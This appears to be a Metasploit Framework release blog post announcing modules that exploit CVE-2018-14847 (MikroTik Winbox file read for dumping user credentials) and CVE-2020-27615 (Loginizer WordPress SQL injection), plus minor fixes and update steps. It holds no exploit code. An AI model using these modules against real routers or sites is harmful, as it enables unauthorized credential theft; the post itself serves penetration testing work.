h00die contributed the Mikrotik unauthenticated directory traversal file read auxiliary gather module, largely a port of the PoC by Ali Mosajjal. The vulnerability CVE-2018-14847 allows any file from the router to be read through the Winbox server in RouterOS due to a lack of validation and trust in the Winbox client. The auxiliary/gather/mikrotik_winbox_fileread
module exploits this vulnerability by communicating with the Winbox server on port 8291 and requests the system user database file. One would hope all vulnerable MikroTik’s have been patched by now, but if you happen to discover a vulnerable instance it’s time to dump the credentials! Vulnerable versions of MikroTik RouterOS are:
Security researcher mslavco discovered an unauthenticated, time-based blind SQL injection in the Loginizer WordPress plugin’s log
parameter. h00die contributed the WordPress Loginizer log SQLi Scanner auxiliary scanner module that exploits the vulnerability (CVE-2020-27615 to extract user credentials and then store them in the database. Loginizer versions 1.6.3 and earlier are vulnerable to the auxiliary/scanner/http/wp_loginizer_log_sqli
module, and it is important to note that successful exploitation requires WordPress 5.4 (or newer) or 5.5 (or newer).
Raw-MD5u
hashes, which are used by Avira to store passwords.auxiliary/scanner/http/zabbix_login
to support Zabbix version 3.x, 4.x, and 5.x up to the latest 5.2 LTS release.URI.encode
function with calls to Rex::Text.uri_encode
in exploits/multi/http/php_fpm_rce
.auxiliary/gather/enum_dns
that only affects zone transfer enumeration (AXFR) by using the nameservers specified in the datastore NS
option.store_loot
in which certain data types were not properly stored and resulted in a subsequent stack trace.nasm
dependency to ensure that tools/exploit/nasm_shell.rb
works as expected when running inside of Docker.As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).